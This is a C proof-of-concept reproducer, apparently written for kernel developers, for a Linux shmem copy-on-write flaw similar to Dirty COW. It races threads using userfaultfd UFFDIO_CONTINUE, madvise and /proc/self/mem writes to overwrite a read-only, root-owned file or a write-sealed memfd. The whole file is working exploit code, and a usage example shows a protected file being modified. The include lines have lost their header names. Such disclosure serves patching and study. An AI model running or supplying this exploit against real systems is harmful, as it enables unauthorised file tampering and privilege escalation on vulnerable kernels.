/* * This is a reproducer for a new privilege escalation issue, similar to * Dirty COW (CVE-2016-5195), introduced by accident into the Linux kernel via: * 9ae0f87d009c ("mm/shmem: unconditionally set pte dirty in mfill_atomic_install_pte") * Part of Linux v5.16 -- v5.19. * * In contrast to Dirty COW, it's limited to shmem only. It uses a combination * of userfaultfd UFFDIO_CONTINUE and madvise(MADV_DONTNEED) to trick * the kernel into not breaking COW, instead allowing to modify an * shmem page without write permissions. * * Example: * $ sudo -s * # rm /tmp/foo * # echo "Shared data" > /tmp/foo * # chmod 0404 /tmp/foo * # exit * $ ls -l /tmp/foo * -r-----r-- 1 root root 12 26. Jul 10:26 /tmp/foo * $ cat /tmp/foo * Shared data * $ gcc -pthread reproducer.c -o reproducer * $ ./reproducer /tmp/foo * Old content: * Shared data * * New content: * 10:27:53ata * $ cat /tmp/foo * 10:27:53ata * * To reproduce faster, it might help to load the system, for example, * using: * $ stress -c `nproc --all` * Or running it inside a VM. * * Details: * We want the following sequence to trigger. Assuming the shared page is * mapped R/O already (e.g., due to previous action from Thread 1): * Thread 2: pwrite() [start] * -> Trigger write fault, replace mapped page by anonymous page * -> COW was broken, remember FOLL_COW * Thread 1: madvise(map, 4096, MADV_DONTNEED); * -> Discard anonymous page * Thread 1: tmp += *((int *)map); * -> Trigger a minor uffd fault * Thread 3: ioctl(uffd, UFFDIO_CONTINUE * -> Resolve minor uffd fault via UFFDIO_CONTINUE * -> Map shared page R/O but set it dirty * Thread 2: pwrite() [continue] * -> Find R/O mapped page that's dirty and FOLL_COW being set * -> Modify shared page R/O because we don't break COW (again) * * Dirty COW (CVE-2016-5195) was originally identified by Phil Oester. * * Thanks to Nadav Amit for pointing out that the pte_dirty() check in * FOLL_FORCE code is problematic and might be exploitable. * * Copyright (C) 2022 Red Hat, Inc. * Author(s): David Hildenbrand */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include int mem_fd; void *map; volatile int tmp; int uffd; char str[80]; void *discard_thread_fn(void *arg) { int ret; while (1) { /* * Zap that page first, such that we can trigger a new * minor fault. */ ret = madvise(map, 4096, MADV_DONTNEED); if (ret < 0) { fprintf(stderr, "madvise() failed: %d\n", errno); exit(1); } /* * Touch the page to trigger a UFFD minor fault. The uffd * thread will resolve the minor fault via a UFFDIO_CONTINUE. */ tmp += *((int *)map); } } void *write_thread_fn(void *arg) { while (1) /* * Ignore any errors -- errors means that pwrite() would * have to trigger a uffd fault and sleep, which the GUP * variant doesn't support, so it fails with an I/O errror. * * Once we retry and are lucky to already find the placed * page via UFFDIO_CONTINUE (from the other threads), we get * no error. */ pwrite(mem_fd, str, strlen(str), (uintptr_t) map); } static void *uffd_thread_fn(void *arg) { static struct uffd_msg msg; /* Data read from userfaultfd */ struct uffdio_continue uffdio; struct uffdio_range uffdio_wake; ssize_t nread; while (1) { struct pollfd pollfd; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1, -1); if (nready == -1) { fprintf(stderr, "poll() failed: %d\n", errno); exit(1); } nread = read(uffd, &msg, sizeof(msg)); if (nread <= 0) continue; uffdio.range.start = (unsigned long) map; uffdio.range.len = 4096; uffdio.mode = 0; if (ioctl(uffd, UFFDIO_CONTINUE, &uffdio) < 0) { if (errno == EEXIST) { uffdio_wake.start = (unsigned long) map; uffdio_wake.len = 4096; if (ioctl(uffd, UFFDIO_WAKE, &uffdio_wake) < 0) { } } else { fprintf(stderr, "UFFDIO_CONTINUE failed: %d\n", errno); } } } } static int setup_uffd(void) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK | UFFD_USER_MODE_ONLY); if (uffd < 0) { fprintf(stderr, "syscall() failed: %d\n", errno); return -errno; } uffdio_api.api = UFFD_API; uffdio_api.features = UFFD_FEATURE_MINOR_SHMEM; if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) { fprintf(stderr, "UFFDIO_API failed: %d\n", errno); return -errno; } if (!(uffdio_api.features & UFFD_FEATURE_MINOR_SHMEM)) { fprintf(stderr, "UFFD_FEATURE_MINOR_SHMEM missing\n"); return -ENOSYS; } uffdio_register.range.start = (unsigned long) map; uffdio_register.range.len = 4096; uffdio_register.mode = UFFDIO_REGISTER_MODE_MINOR; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) { fprintf(stderr, "UFFDIO_REGISTER failed: %d\n", errno); return -errno; } return 0; } static void print_content(int fd) { ssize_t ret; char buf[80]; int offs = 0; while (1) { ret = pread(fd, buf, sizeof(buf) - 1, offs); if (ret > 0) { buf[ret] = 0; printf("%s", buf); offs += ret; } else if (!ret) { break; } else { fprintf(stderr, "pread() failed: %d\n", errno); } } printf("\n"); } int main(int argc, char *argv[]) { pthread_t thread1, thread2, thread3; struct tm *time_info; time_t current_time; char tmp[80]; int fd; if (argc < 2) { const char *shared_str = "Shared data"; printf("Testing with sealed memfd\n"); fd = memfd_create("test", MFD_ALLOW_SEALING); if (fd < 0) { fprintf(stderr, "memfd_create() failed: %d\n", errno); return 1; } if (ftruncate(fd, strlen(shared_str))) { fprintf(stderr, "ftruncate() failed: %d\n", errno); return 1; } if (pwrite(fd, shared_str, strlen(shared_str), 0) != strlen(shared_str)) { fprintf(stderr, "pwrite() failed: %d\n", errno); return 1; } if (fcntl(fd, F_ADD_SEALS, F_SEAL_GROW | F_SEAL_SHRINK | F_SEAL_WRITE | F_SEAL_SEAL) < 0) { fprintf(stderr, "fcntl() failed: %d\n", errno); return 1; } } else if (argc == 2) { fd = open(argv[1], O_RDONLY); if (fd < 0) { fprintf(stderr, "open() failed: %d\n", errno); return 1; } } else { fprintf(stderr, "usage: %s target_file\n", argv[0]); return 1; } mem_fd = open("/proc/self/mem", O_RDWR); if (mem_fd < 0) { fprintf(stderr, "open(/proc/self/mem) failed: %d\n", errno); return 1; } map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd ,0); if (map == MAP_FAILED) { fprintf(stderr, "mmap() failed: %d\n", errno); return 1; } if (setup_uffd()) return 1; /* Prepare the string we'll want to store. */ time(¤t_time); time_info = localtime(¤t_time); strftime(str, sizeof(str), "%H:%M:%S", time_info); printf("Old content: \n"); print_content(fd); pthread_create(&thread1, NULL, discard_thread_fn, NULL); pthread_create(&thread2, NULL, write_thread_fn, NULL); pthread_create(&thread3, NULL, uffd_thread_fn, NULL); /* Loop until we succeeded with our modification. */ while (1) { ssize_t ret = pread(fd, tmp, strlen(str), 0); if (ret > 0) { tmp[ret] = 0; if (!strcmp(tmp, str)) break; } } printf("New content: \n"); print_content(fd); return 0; }